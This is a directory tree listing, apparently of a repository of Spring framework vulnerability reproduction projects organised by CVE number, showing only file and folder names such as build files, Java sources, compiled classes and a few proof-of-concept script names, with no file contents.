├── CVE-2013-4152
├── CVE-2013-4152.iml
├── out
│ ├── artifacts
│ │ └── CVE_2013_4152_war_exploded
│ │ │ ├── WEB-INF
│ │ │ ├── classes
│ │ │ │ ├── applicationContext.xml
│ │ │ │ └── org
│ │ │ │ │ └── example
│ │ │ │ │ └── jaxb
│ │ │ │ │ ├── JaxbController.class
│ │ │ │ │ ├── Mapper.class
│ │ │ │ │ ├── Order.class
│ │ │ │ │ ├── Settings.class
│ │ │ │ │ └── User.class
│ │ │ ├── jsp
│ │ │ │ ├── hello.jsp
│ │ │ │ └── test.jsp
│ │ │ ├── lib
│ │ │ │ ├── commons-fileupload-1.2.jar
│ │ │ │ ├── commons-logging-1.1.1.jar
│ │ │ │ ├── jstl-1.2.jar
│ │ │ │ ├── spring-aop-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-aspects-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-beans-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-build-src-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-context-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-context-support-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-core-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-data-commons-1.5.0.RELEASE.jar
│ │ │ │ ├── spring-data-jpa-1.5.0.RELEASE.jar
│ │ │ │ ├── spring-expression-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-instrument-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-instrument-tomcat-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-jdbc-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-jms-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-orm-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-oxm-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-struts-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-test-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-tx-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-web-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-webmvc-3.2.4.RELEASE.jar
│ │ │ │ ├── spring-webmvc-portlet-3.2.4.RELEASE.jar
│ │ │ │ ├── standard.jar
│ │ │ │ ├── xml-apis-1.4.01.jar
│ │ │ │ ├── xml-resolver-1.2.jar
│ │ │ │ ├── xmlpull-1.1.3.1.jar
│ │ │ │ ├── xmlschema-core-2.2.1.jar
│ │ │ │ ├── xpp3_min-1.1.4c.jar
│ │ │ │ └── xstream-1.4.6.jar
│ │ │ ├── spring-servlet.xml
│ │ │ └── web.xml
│ │ │ ├── index.jsp
│ │ │ └── resources
│ │ │ └── applicationContext.xml
│ └── production
│ │ └── CVE-2013-4152
│ │ ├── applicationContext.xml
│ │ └── org
│ │ └── example
│ │ └── jaxb
│ │ ├── JaxbController.class
│ │ ├── Mapper.class
│ │ ├── Order.class
│ │ ├── Settings.class
│ │ └── User.class
├── src
│ └── org
│ │ └── example
│ │ └── jaxb
│ │ ├── JaxbController.java
│ │ ├── Mapper.java
│ │ ├── Order.java
│ │ └── Settings.java
└── web
│ ├── WEB-INF
│ ├── jsp
│ │ ├── hello.jsp
│ │ └── test.jsp
│ ├── lib
│ │ ├── commons-fileupload-1.2.jar
│ │ ├── commons-logging-1.1.1.jar
│ │ ├── jstl-1.2.jar
│ │ ├── spring-aop-3.2.4.RELEASE.jar
│ │ ├── spring-aspects-3.2.4.RELEASE.jar
│ │ ├── spring-beans-3.2.4.RELEASE.jar
│ │ ├── spring-build-src-3.2.4.RELEASE.jar
│ │ ├── spring-context-3.2.4.RELEASE.jar
│ │ ├── spring-context-support-3.2.4.RELEASE.jar
│ │ ├── spring-core-3.2.4.RELEASE.jar
│ │ ├── spring-data-commons-1.5.0.RELEASE.jar
│ │ ├── spring-data-jpa-1.5.0.RELEASE.jar
│ │ ├── spring-expression-3.2.4.RELEASE.jar
│ │ ├── spring-instrument-3.2.4.RELEASE.jar
│ │ ├── spring-instrument-tomcat-3.2.4.RELEASE.jar
│ │ ├── spring-jdbc-3.2.4.RELEASE.jar
│ │ ├── spring-jms-3.2.4.RELEASE.jar
│ │ ├── spring-orm-3.2.4.RELEASE.jar
│ │ ├── spring-oxm-3.2.4.RELEASE.jar
│ │ ├── spring-struts-3.2.4.RELEASE.jar
│ │ ├── spring-test-3.2.4.RELEASE.jar
│ │ ├── spring-tx-3.2.4.RELEASE.jar
│ │ ├── spring-web-3.2.4.RELEASE.jar
│ │ ├── spring-webmvc-3.2.4.RELEASE.jar
│ │ ├── spring-webmvc-portlet-3.2.4.RELEASE.jar
│ │ ├── standard.jar
│ │ ├── xml-apis-1.4.01.jar
│ │ ├── xml-resolver-1.2.jar
│ │ ├── xmlpull-1.1.3.1.jar
│ │ ├── xmlschema-core-2.2.1.jar
│ │ ├── xpp3_min-1.1.4c.jar
│ │ └── xstream-1.4.6.jar
│ ├── spring-servlet.xml
│ └── web.xml
│ ├── index.jsp
│ └── resources
│ ├── applicationContext.xml
│ └── poc.xml
├── CVE-2016-4977
├── demo.iml
├── pom.xml
├── src
│ └── main
│ │ ├── java
│ │ └── com
│ │ │ └── example
│ │ │ └── DemoApplication.java
│ │ └── resources
│ │ └── application.properties
└── target
│ └── classes
│ ├── application.properties
│ └── com
│ └── example
│ └── DemoApplication.class
├── CVE-2017-8046
├── accessing-data-rest-complete.iml
├── build.gradle
├── gradle
│ └── wrapper
│ │ ├── gradle-wrapper.jar
│ │ └── gradle-wrapper.properties
├── gradlew
├── gradlew.bat
├── mvnw
├── mvnw.cmd
├── pom.xml
├── settings.gradle
├── src
│ ├── main
│ │ └── java
│ │ │ └── com
│ │ │ └── example
│ │ │ └── accessingdatarest
│ │ │ ├── AccessingDataRestApplication.java
│ │ │ ├── Person.java
│ │ │ └── PersonRepository.java
│ └── test
│ │ └── java
│ │ └── com
│ │ └── example
│ │ └── accessingdatarest
│ │ └── AccessingDataRestApplicationTests.java
└── target
│ ├── classes
│ └── com
│ │ └── example
│ │ └── accessingdatarest
│ │ ├── AccessingDataRestApplication.class
│ │ ├── Person.class
│ │ └── PersonRepository.class
│ └── test-classes
│ └── com
│ └── example
│ └── accessingdatarest
│ └── AccessingDataRestApplicationTests.class
├── CVE-2018-1259
├── README.md
├── pom.xml
├── spring-data-web-projection.iml
├── src
│ └── main
│ │ ├── java
│ │ └── example
│ │ │ └── users
│ │ │ ├── Application.java
│ │ │ └── UserController.java
│ │ └── resources
│ │ └── application.properties
└── target
│ └── classes
│ ├── application.properties
│ └── example
│ └── users
│ ├── Application.class
│ ├── UserController$UserPayload.class
│ └── UserController.class
├── CVE-2018-1260
├── demo.iml
├── pom.xml
├── src
│ └── main
│ │ ├── java
│ │ └── com
│ │ │ └── example
│ │ │ ├── DefaultOAuth2RequestValidator.java
│ │ │ ├── DemoApplication.java
│ │ │ └── OAuthSecurityConfig.java
│ │ └── resources
│ │ └── application.properties
└── target
│ └── classes
│ ├── application.properties
│ └── com
│ └── example
│ ├── DefaultOAuth2RequestValidator.class
│ ├── DemoApplication.class
│ └── OAuthSecurityConfig.class
├── CVE-2018-1261
├── HELP.md
├── cve_2018_1261.py
├── demo.iml
├── mvnw
├── mvnw.cmd
├── pom.xml
├── src
│ ├── main
│ │ ├── java
│ │ │ └── com
│ │ │ │ └── example
│ │ │ │ └── demo
│ │ │ │ ├── AbstractZipTransformer.java
│ │ │ │ ├── DemoApplication.java
│ │ │ │ ├── SpringZipUtils.java
│ │ │ │ ├── UnZipTransformer.java
│ │ │ │ ├── ZipHeaders.java
│ │ │ │ ├── ZipResultType.java
│ │ │ │ └── ZipTransformer.java
│ │ └── resources
│ │ │ ├── application.properties
│ │ │ └── test.zip
│ └── test
│ │ └── java
│ │ └── com
│ │ └── example
│ │ └── demo
│ │ └── DemoApplicationTests.java
└── target
│ └── classes
│ ├── application.properties
│ ├── com
│ └── example
│ │ └── demo
│ │ ├── AbstractZipTransformer.class
│ │ ├── DemoApplication.class
│ │ ├── SpringZipUtils.class
│ │ ├── UnZipTransformer$1.class
│ │ ├── UnZipTransformer.class
│ │ ├── ZipHeaders.class
│ │ ├── ZipResultType.class
│ │ └── ZipTransformer.class
│ └── test.zip
├── CVE-2018-1270
├── build.gradle
├── cve-2018-1270.py
├── gradle
│ └── wrapper
│ │ ├── gradle-wrapper.jar
│ │ └── gradle-wrapper.properties
├── gradlew
├── gradlew.bat
├── gs-messaging-stomp-websocket.iml
├── mvnw
├── mvnw.cmd
├── pom.xml
├── src
│ ├── main
│ │ ├── java
│ │ │ └── hello
│ │ │ │ ├── Application.java
│ │ │ │ ├── Greeting.java
│ │ │ │ ├── GreetingController.java
│ │ │ │ ├── HelloMessage.java
│ │ │ │ └── WebSocketConfig.java
│ │ └── resources
│ │ │ ├── application.properties
│ │ │ └── static
│ │ │ ├── app.js
│ │ │ ├── index.html
│ │ │ └── main.css
│ └── test
│ │ └── java
│ │ └── hello
│ │ └── GreetingIntegrationTests.java
└── target
│ ├── classes
│ ├── application.properties
│ ├── hello
│ │ ├── Application.class
│ │ ├── Greeting.class
│ │ ├── GreetingController.class
│ │ ├── HelloMessage.class
│ │ └── WebSocketConfig.class
│ └── static
│ │ ├── app.js
│ │ ├── index.html
│ │ └── main.css
│ └── test-classes
│ └── hello
│ ├── GreetingIntegrationTests$1$1.class
│ ├── GreetingIntegrationTests$1.class
│ ├── GreetingIntegrationTests$TestSessionHandler.class
│ └── GreetingIntegrationTests.class
├── CVE-2018-1273
├── README.md
├── pom.xml
├── spring-data-web-example.iml
├── src
│ ├── main
│ │ ├── java
│ │ │ └── example
│ │ │ │ ├── Application.java
│ │ │ │ └── users
│ │ │ │ ├── Password.java
│ │ │ │ ├── User.java
│ │ │ │ ├── UserManagement.java
│ │ │ │ ├── UserRepository.java
│ │ │ │ ├── Username.java
│ │ │ │ └── web
│ │ │ │ └── UserController.java
│ │ └── resources
│ │ │ ├── application.properties
│ │ │ ├── messages.properties
│ │ │ ├── static
│ │ │ └── css
│ │ │ │ └── style.css
│ │ │ └── templates
│ │ │ └── users.html
│ └── test
│ │ └── java
│ │ └── example
│ │ └── users
│ │ ├── AbstractIntegrationTests.java
│ │ ├── UserManagementIntegrationTests.java
│ │ └── UserRepositoryIntegrationTests.java
└── target
│ └── classes
│ ├── application.properties
│ ├── example
│ ├── Application.class
│ └── users
│ │ ├── Password.class
│ │ ├── User.class
│ │ ├── UserManagement.class
│ │ ├── UserRepository.class
│ │ ├── Username.class
│ │ └── web
│ │ ├── UserController$UserForm.class
│ │ └── UserController.class
│ ├── messages.properties
│ ├── static
│ └── css
│ │ └── style.css
│ └── templates
│ └── users.html
├── CVE-2019-3799
├── pom.xml
├── spring-cloud-config-server.iml
└── src
│ └── main
│ ├── java
│ └── org
│ │ └── springframework
│ │ └── cloud
│ │ └── config
│ │ └── server
│ │ ├── ConfigServerApplication.java
│ │ ├── EnableConfigServer.java
│ │ ├── bootstrap
│ │ ├── ConfigServerBootstrapApplicationListener.java
│ │ └── ConfigServerBootstrapConfiguration.java
│ │ ├── composite
│ │ ├── CompositeEnvironmentBeanFactoryPostProcessor.java
│ │ ├── CompositeUtils.java
│ │ ├── ConditionalOnMissingSearchPathLocator.java
│ │ ├── ConditionalOnSearchPathLocator.java
│ │ └── OnSearchPathLocatorPresent.java
│ │ ├── config
│ │ ├── CompositeConfiguration.java
│ │ ├── ConfigServerAutoConfiguration.java
│ │ ├── ConfigServerConfiguration.java
│ │ ├── ConfigServerEncryptionConfiguration.java
│ │ ├── ConfigServerHealthIndicator.java
│ │ ├── ConfigServerMvcConfiguration.java
│ │ ├── ConfigServerProperties.java
│ │ ├── EncryptionAutoConfiguration.java
│ │ ├── EnvironmentRepositoryConfiguration.java
│ │ └── ResourceRepositoryConfiguration.java
│ │ ├── diagnostics
│ │ └── GitUriFailureAnalyzer.java
│ │ ├── encryption
│ │ ├── CipherEnvironmentEncryptor.java
│ │ ├── EncryptionController.java
│ │ ├── EnvironmentEncryptor.java
│ │ ├── EnvironmentPrefixHelper.java
│ │ ├── KeyStoreTextEncryptorLocator.java
│ │ ├── LocatorTextEncryptor.java
│ │ ├── PassthruSecretLocator.java
│ │ ├── SecretLocator.java
│ │ ├── SingleTextEncryptorLocator.java
│ │ └── TextEncryptorLocator.java
│ │ ├── environment
│ │ ├── AbstractScmEnvironmentRepository.java
│ │ ├── CompositeEnvironmentRepository.java
│ │ ├── ConfigurableHttpConnectionFactory.java
│ │ ├── ConsulEnvironmentWatch.java
│ │ ├── EnvironmentCleaner.java
│ │ ├── EnvironmentController.java
│ │ ├── EnvironmentEncryptorEnvironmentRepository.java
│ │ ├── EnvironmentNotFoundException.java
│ │ ├── EnvironmentRepository.java
│ │ ├── EnvironmentRepositoryFactory.java
│ │ ├── EnvironmentRepositoryPropertySourceLocator.java
│ │ ├── EnvironmentWatch.java
│ │ ├── HttpClientConfigurableHttpConnectionFactory.java
│ │ ├── HttpClientVaultRestTemplateFactory.java
│ │ ├── JGitEnvironmentProperties.java
│ │ ├── JGitEnvironmentRepository.java
│ │ ├── JdbcEnvironmentProperties.java
│ │ ├── JdbcEnvironmentRepository.java
│ │ ├── JdbcEnvironmentRepositoryFactory.java
│ │ ├── MultipleJGitEnvironmentProperties.java
│ │ ├── MultipleJGitEnvironmentRepository.java
│ │ ├── MultipleJGitEnvironmentRepositoryFactory.java
│ │ ├── NativeEnvironmentProperties.java
│ │ ├── NativeEnvironmentRepository.java
│ │ ├── NativeEnvironmentRepositoryFactory.java
│ │ ├── NoSuchLabelException.java
│ │ ├── NoSuchRepositoryException.java
│ │ ├── PassthruEnvironmentRepository.java
│ │ ├── RepositoryException.java
│ │ ├── SearchPathCompositeEnvironmentRepository.java
│ │ ├── SearchPathLocator.java
│ │ ├── SerializableMapPropertySource.java
│ │ ├── SvnEnvironmentRepositoryFactory.java
│ │ ├── SvnKitEnvironmentProperties.java
│ │ ├── SvnKitEnvironmentRepository.java
│ │ ├── VaultEnvironmentProperties.java
│ │ ├── VaultEnvironmentRepository.java
│ │ ├── VaultEnvironmentRepositoryFactory.java
│ │ ├── VaultKvAccessStrategy.java
│ │ ├── VaultKvAccessStrategyFactory.java
│ │ └── VaultKvAccessStrategySupport.java
│ │ ├── proxy
│ │ ├── ProxyHostCredentialsProvider.java
│ │ ├── ProxyHostProperties.java
│ │ └── SchemeBasedRoutePlanner.java
│ │ ├── resource
│ │ ├── GenericResourceRepository.java
│ │ ├── NoSuchResourceException.java
│ │ ├── ResourceController.java
│ │ └── ResourceRepository.java
│ │ ├── ssh
│ │ ├── FileBasedSshTransportConfigCallback.java
│ │ ├── HostKeyAlgoSupported.java
│ │ ├── HostKeyAlgoSupportedValidator.java
│ │ ├── HostKeyAndAlgoBothExist.java
│ │ ├── HostKeyAndAlgoBothExistValidator.java
│ │ ├── KnownHostsFileIsValid.java
│ │ ├── KnownHostsFileValidator.java
│ │ ├── PrivateKeyIsValid.java
│ │ ├── PrivateKeyValidator.java
│ │ ├── PropertiesBasedSshTransportConfigCallback.java
│ │ ├── PropertyBasedSshSessionFactory.java
│ │ ├── SshPropertyValidator.java
│ │ └── SshUriPropertyProcessor.java
│ │ ├── support
│ │ ├── AbstractScmAccessor.java
│ │ ├── AbstractScmAccessorProperties.java
│ │ ├── AwsCodeCommitCredentialProvider.java
│ │ ├── CredentialException.java
│ │ ├── EnvironmentPropertySource.java
│ │ ├── EnvironmentRepositoryProperties.java
│ │ ├── GitCredentialsProviderFactory.java
│ │ ├── GitSkipSslValidationCredentialsProvider.java
│ │ ├── HttpClientSupport.java
│ │ ├── HttpEnvironmentRepositoryProperties.java
│ │ └── PassphraseCredentialsProvider.java
│ │ └── test
│ │ └── ConfigServerTestUtils.java
│ └── resources
│ ├── META-INF
│ └── spring.factories
│ └── configserver.yml
├── CVE-2020-5398
├── HELP.md
├── demo.iml
├── mvnw
├── mvnw.cmd
├── pom.xml
├── src
│ ├── main
│ │ ├── java
│ │ │ └── com
│ │ │ │ └── example
│ │ │ │ └── demo
│ │ │ │ ├── DemoApplication.java
│ │ │ │ └── MainController.java
│ │ └── resources
│ │ │ └── application.properties
│ └── test
│ │ └── java
│ │ └── com
│ │ └── example
│ │ └── demo
│ │ └── DemoApplicationTests.java
└── target
│ ├── classes
│ ├── application.properties
│ └── com
│ │ └── example
│ │ └── demo
│ │ ├── DemoApplication.class
│ │ └── MainController.class
│ └── test-classes
│ └── com
│ └── example
│ └── demo
│ └── DemoApplicationTests.class
├── CVE-2020-5412
├── hystrix-dashboard.iml
├── mvnw
├── mvnw.cmd
├── pom.xml
├── src
│ ├── main
│ │ ├── java
│ │ │ └── com
│ │ │ │ └── org
│ │ │ │ └── example
│ │ │ │ └── HystrixDashboardApplication.java
│ │ └── resources
│ │ │ └── bootstrap.properties
│ └── test
│ │ └── java
│ │ └── com
│ │ └── org
│ │ └── example
│ │ └── HystrixDashboardApplicationTests.java
└── target
│ ├── classes
│ ├── bootstrap.properties
│ └── com
│ │ └── org
│ │ └── example
│ │ └── HystrixDashboardApplication.class
│ └── test-classes
│ └── com
│ └── org
│ └── example
│ └── HystrixDashboardApplicationTests.class
├── CVE-2020-5421
├── CVE-2020-5421.iml
├── Readme.md
├── pom.xml
├── src
│ └── main
│ │ ├── java
│ │ └── com
│ │ │ └── org
│ │ │ └── example
│ │ │ ├── SpringBootApplication.java
│ │ │ ├── config
│ │ │ └── FilterConfig.java
│ │ │ ├── controller
│ │ │ └── TestController.java
│ │ │ └── filter
│ │ │ └── SpringJsessionidRdfFilter.java
│ │ └── resources
│ │ └── application.properties
└── target
│ └── classes
│ ├── application.properties
│ └── com
│ └── org
│ └── example
│ ├── SpringBootApplication.class
│ ├── config
│ └── FilterConfig.class
│ ├── controller
│ └── TestController.class
│ └── filter
│ └── SpringJsessionidRdfFilter.class
├── CVE-2021-21234
├── Dockerfile
├── pom.xml
├── spring-boot-hello-world-example.iml
├── spring.log
│ └── spring.log
├── src
│ └── main
│ │ ├── java
│ │ └── com
│ │ │ └── boraji
│ │ │ └── tutorial
│ │ │ └── springboot
│ │ │ ├── MainApp.java
│ │ │ └── controller
│ │ │ └── HelloWorldController.java
│ │ └── resources
│ │ └── application.properties
└── target
│ └── classes
│ ├── application.properties
│ └── com
│ └── boraji
│ └── tutorial
│ └── springboot
│ ├── MainApp.class
│ └── controller
│ └── HelloWorldController.class
├── CVE-2021-22053
├── HELP.md
├── demo.iml
├── mvnw
├── mvnw.cmd
├── pom.xml
├── src
│ ├── main
│ │ ├── java
│ │ │ └── com
│ │ │ │ └── example
│ │ │ │ └── demo
│ │ │ │ └── DemoApplication.java
│ │ └── resources
│ │ │ └── application.properties
│ └── test
│ │ └── java
│ │ └── com
│ │ └── example
│ │ └── demo
│ │ └── DemoApplicationTests.java
└── target
│ ├── classes
│ ├── application.properties
│ └── com
│ │ └── example
│ │ └── demo
│ │ └── DemoApplication.class
│ └── test-classes
│ └── com
│ └── example
│ └── demo
│ └── DemoApplicationTests.class
├── CVE-2022-22947
├── HELP.md
├── demo.iml
├── mvnw
├── mvnw.cmd
├── pom.xml
├── src
│ ├── main
│ │ ├── java
│ │ │ └── com
│ │ │ │ └── example
│ │ │ │ └── demo
│ │ │ │ └── DemoApplication.java
│ │ └── resources
│ │ │ ├── application.properties
│ │ │ └── application.yaml
│ └── test
│ │ └── java
│ │ └── com
│ │ └── example
│ │ └── demo
│ │ └── DemoApplicationTests.java
└── target
│ ├── classes
│ ├── application.properties
│ ├── application.yaml
│ └── com
│ │ └── example
│ │ └── demo
│ │ └── DemoApplication.class
│ └── test-classes
│ └── com
│ └── example
│ └── demo
│ └── DemoApplicationTests.class
├── CVE-2022-22963
├── HELP.md
├── demo.iml
├── mvnw
├── mvnw.cmd
├── pom.xml
├── src
│ ├── main
│ │ ├── java
│ │ │ └── com
│ │ │ │ └── example
│ │ │ │ └── demo
│ │ │ │ ├── DemoApplication.java
│ │ │ │ └── TestController.java
│ │ └── resources
│ │ │ └── application.properties
│ └── test
│ │ └── java
│ │ └── com
│ │ └── example
│ │ └── demo
│ │ └── DemoApplicationTests.java
└── target
│ ├── classes
│ ├── application.properties
│ └── com
│ │ └── example
│ │ └── demo
│ │ ├── DemoApplication.class
│ │ └── TestController.class
│ └── test-classes
│ └── com
│ └── example
│ └── demo
│ └── DemoApplicationTests.class
├── CVE-2022-22965
├── SpringRCEDemo.iml
├── pom.xml
├── src
│ └── main
│ │ ├── java
│ │ └── org
│ │ │ └── axisx
│ │ │ └── SpringRCEDemo
│ │ │ ├── GlobalFilter.java
│ │ │ ├── HelloController.java
│ │ │ └── User.java
│ │ ├── resources
│ │ └── spring
│ │ │ └── spring-mvc.xml
│ │ └── webapp
│ │ ├── WEB-INF
│ │ └── web.xml
│ │ ├── index.jsp
│ │ └── shell.jsp
└── target
│ ├── SpringRCEDemo-1.0-SNAPSHOT.war
│ ├── SpringRCEDemo-1.0-SNAPSHOT
│ ├── WEB-INF
│ │ ├── classes
│ │ │ ├── org
│ │ │ │ ├── axisx
│ │ │ │ │ └── SpringRCEDemo
│ │ │ │ │ │ ├── GlobalFilter.class
│ │ │ │ │ │ ├── HelloController.class
│ │ │ │ │ │ └── User.class
│ │ │ │ └── magiczero
│ │ │ │ │ └── SpringRCEDemo
│ │ │ │ │ ├── HelloController.class
│ │ │ │ │ └── User.class
│ │ │ └── spring
│ │ │ │ └── spring-mvc.xml
│ │ ├── lib
│ │ │ ├── aspectjweaver-1.9.7.jar
│ │ │ ├── slf4j-api-1.7.21.jar
│ │ │ ├── spring-aop-5.3.16.jar
│ │ │ ├── spring-aspects-5.3.16.jar
│ │ │ ├── spring-beans-5.3.16.jar
│ │ │ ├── spring-context-5.3.16.jar
│ │ │ ├── spring-context-support-5.3.16.jar
│ │ │ ├── spring-core-5.3.16.jar
│ │ │ ├── spring-expression-5.3.16.jar
│ │ │ ├── spring-jcl-5.3.16.jar
│ │ │ ├── spring-ldap-core-2.3.3.RELEASE.jar
│ │ │ ├── spring-oxm-5.3.16.jar
│ │ │ ├── spring-security-core-5.4.2.jar
│ │ │ ├── spring-security-ldap-5.4.2.jar
│ │ │ ├── spring-test-5.3.16.jar
│ │ │ ├── spring-tx-5.2.11.RELEASE.jar
│ │ │ ├── spring-web-5.3.16.jar
│ │ │ └── spring-webmvc-5.3.16.jar
│ │ ├── shell3.jsp
│ │ └── web.xml
│ ├── index.jsp
│ ├── shell.jsp
│ └── shell1.jsp
│ ├── classes
│ ├── org
│ │ └── axisx
│ │ │ └── SpringRCEDemo
│ │ │ ├── HelloController.class
│ │ │ └── User.class
│ └── spring
│ │ └── spring-mvc.xml
│ ├── maven-archiver
│ └── pom.properties
│ └── maven-status
│ └── maven-compiler-plugin
│ ├── compile
│ └── default-compile
│ │ ├── createdFiles.lst
│ │ └── inputFiles.lst
│ └── testCompile
│ └── default-testCompile
│ └── inputFiles.lst
├── CVE-2022-22978
├── HELP.md
├── demo.iml
├── mvnw
├── mvnw.cmd
├── pom.xml
├── src
│ ├── main
│ │ ├── java
│ │ │ └── com
│ │ │ │ └── example
│ │ │ │ └── demo
│ │ │ │ ├── Config
│ │ │ │ └── AuthConfig.java
│ │ │ │ ├── Controller
│ │ │ │ └── AuthController.java
│ │ │ │ └── DemoApplication.java
│ │ └── resources
│ │ │ └── application.properties
│ └── test
│ │ └── java
│ │ └── com
│ │ └── example
│ │ └── demo
│ │ └── DemoApplicationTests.java
└── target
│ ├── classes
│ ├── application.properties
│ └── com
│ │ └── example
│ │ └── demo
│ │ ├── Config
│ │ └── AuthConfig.class
│ │ ├── Controller
│ │ └── AuthController.class
│ │ └── DemoApplication.class
│ └── test-classes
│ └── com
│ └── example
│ └── demo
│ └── DemoApplicationTests.class
├── CVE-2022-22979
├── CVE-2022-22979.iml
├── HELP.md
├── mvnw
├── mvnw.cmd
├── pom.xml
├── src
│ ├── main
│ │ ├── java
│ │ │ └── com
│ │ │ │ └── example
│ │ │ │ └── demo
│ │ │ │ ├── DemoApplication.java
│ │ │ │ ├── LowercaseConfiguration.java
│ │ │ │ └── TestController.java
│ │ └── resources
│ │ │ └── application.properties
│ └── test
│ │ └── java
│ │ └── com
│ │ └── example
│ │ └── demo
│ │ ├── DemoApplicationTests.java
│ │ ├── SampleApplicationMvcTests.java
│ │ └── SampleApplicationTests.java
└── target
│ ├── classes
│ ├── application.properties
│ └── com
│ │ └── example
│ │ └── demo
│ │ ├── Bar.class
│ │ ├── DemoApplication.class
│ │ ├── Foo.class
│ │ ├── LowercaseConfiguration.class
│ │ └── TestController.class
│ └── test-classes
│ └── com
│ └── example
│ └── demo
│ └── DemoApplicationTests.class
├── CVE-2022-31692
├── HELP.md
├── demo.iml
├── mvnw
├── mvnw.cmd
├── pom.xml
├── src
│ ├── main
│ │ ├── java
│ │ │ └── com
│ │ │ │ └── example
│ │ │ │ └── demo
│ │ │ │ ├── Config
│ │ │ │ └── AuthConfig.java
│ │ │ │ ├── Controller
│ │ │ │ └── AuthController.java
│ │ │ │ └── DemoApplication.java
│ │ └── resources
│ │ │ └── application.properties
│ └── test
│ │ └── java
│ │ └── com
│ │ └── example
│ │ └── demo
│ │ └── DemoApplicationTests.java
└── target
│ ├── classes
│ ├── application.properties
│ └── com
│ │ └── example
│ │ └── demo
│ │ ├── Config
│ │ └── AuthConfig.class
│ │ ├── Controller
│ │ └── AuthController.class
│ │ └── DemoApplication.class
│ └── test-classes
│ └── com
│ └── example
│ └── demo
│ └── DemoApplicationTests.class
├── CVE-2023-20860
├── HELP.md
├── demo.iml
├── mvnw
├── mvnw.cmd
├── pom.xml
├── src
│ ├── main
│ │ ├── java
│ │ │ └── com
│ │ │ │ └── example
│ │ │ │ └── demo
│ │ │ │ ├── Config
│ │ │ │ └── AuthConfig.java
│ │ │ │ ├── Controller
│ │ │ │ └── AuthController.java
│ │ │ │ └── DemoApplication.java
│ │ └── resources
│ │ │ └── application.properties
│ └── test
│ │ └── java
│ │ └── com
│ │ └── example
│ │ └── demo
│ │ └── DemoApplicationTests.java
└── target
│ ├── classes
│ ├── application.properties
│ └── com
│ │ └── example
│ │ └── demo
│ │ ├── Config
│ │ └── AuthConfig.class
│ │ ├── Controller
│ │ └── AuthController.class
│ │ └── DemoApplication.class
│ └── test-classes
│ └── com
│ └── example
│ └── demo
│ └── DemoApplicationTests.class
├── CVE-2023-34034
├── HELP.md
├── demo.iml
├── mvnw
├── mvnw.cmd
├── pom.xml
├── src
│ ├── main
│ │ ├── java
│ │ │ └── com
│ │ │ │ └── example
│ │ │ │ └── demo
│ │ │ │ ├── Config
│ │ │ │ └── AuthConfig.java
│ │ │ │ ├── Controller
│ │ │ │ ├── AdminController.java
│ │ │ │ └── PublicController.java
│ │ │ │ └── DemoApplication.java
│ │ └── resources
│ │ │ └── application.properties
│ └── test
│ │ └── java
│ │ └── com
│ │ └── example
│ │ └── demo
│ │ └── DemoApplicationTests.java
└── target
│ └── classes
│ ├── application.properties
│ └── com
│ └── example
│ └── demo
│ ├── Config
│ └── AuthConfig.class
│ ├── Controller
│ ├── AdminController.class
│ └── PublicController.class
│ └── DemoApplication.class
├── CVE-2023-34035
├── HELP.md
├── demo.iml
├── mvnw
├── mvnw.cmd
├── pom.xml
├── src
│ ├── main
│ │ ├── java
│ │ │ └── com
│ │ │ │ └── example
│ │ │ │ └── demo
│ │ │ │ ├── Config
│ │ │ │ └── AuthConfig.java
│ │ │ │ ├── Controller
│ │ │ │ └── AuthController.java
│ │ │ │ └── DemoApplication.java
│ │ └── resources
│ │ │ └── application.properties
│ └── test
│ │ └── java
│ │ └── com
│ │ └── example
│ │ └── demo
│ │ └── DemoApplicationTests.java
└── target
│ ├── classes
│ ├── application.properties
│ └── com
│ │ └── example
│ │ └── demo
│ │ ├── Config
│ │ └── AuthConfig.class
│ │ ├── Controller
│ │ └── AuthController.class
│ │ └── DemoApplication.class
│ ├── demo-0.0.1-SNAPSHOT.jar
│ ├── demo-0.0.1-SNAPSHOT.jar.original
│ ├── maven-archiver
│ └── pom.properties
│ ├── maven-status
│ └── maven-compiler-plugin
│ │ ├── compile
│ │ └── default-compile
│ │ │ ├── createdFiles.lst
│ │ │ └── inputFiles.lst
│ │ └── testCompile
│ │ └── default-testCompile
│ │ ├── createdFiles.lst
│ │ └── inputFiles.lst
│ ├── surefire-reports
│ ├── TEST-com.example.demo.DemoApplicationTests.xml
│ └── com.example.demo.DemoApplicationTests.txt
│ └── test-classes
│ └── com
│ └── example
│ └── demo
│ └── DemoApplicationTests.class
├── Projects
├── Spring-WebSocket-with-STOMP
│ ├── README.md
│ ├── pom.xml
│ ├── spring-websocket-integration.iml
│ ├── src
│ │ └── main
│ │ │ ├── java
│ │ │ └── com
│ │ │ │ └── devglan
│ │ │ │ ├── Application.java
│ │ │ │ ├── config
│ │ │ │ └── WebSocketConfig.java
│ │ │ │ ├── controller
│ │ │ │ └── WebSocketController.java
│ │ │ │ ├── interceptor
│ │ │ │ ├── ReceiveMessageChannelInterceptor.java
│ │ │ │ ├── SendMessageChannelInterceptor.java
│ │ │ │ └── WebSocketHandshakeInterceptor.java
│ │ │ │ └── websocket
│ │ │ │ └── event
│ │ │ │ ├── StompConnectEventListener.java
│ │ │ │ ├── StompConnectedEventListener.java
│ │ │ │ └── StompSubscribeEventListener.java
│ │ │ └── resources
│ │ │ ├── application.properties
│ │ │ └── static
│ │ │ ├── app.js
│ │ │ ├── bootstrap.min.css
│ │ │ ├── index.html
│ │ │ ├── jquery-1.10.2.min.js
│ │ │ ├── main.css
│ │ │ └── stomp.js
│ └── target
│ │ └── classes
│ │ ├── application.properties
│ │ ├── com
│ │ └── devglan
│ │ │ ├── Application.class
│ │ │ ├── config
│ │ │ ├── WebSocketConfig$1.class
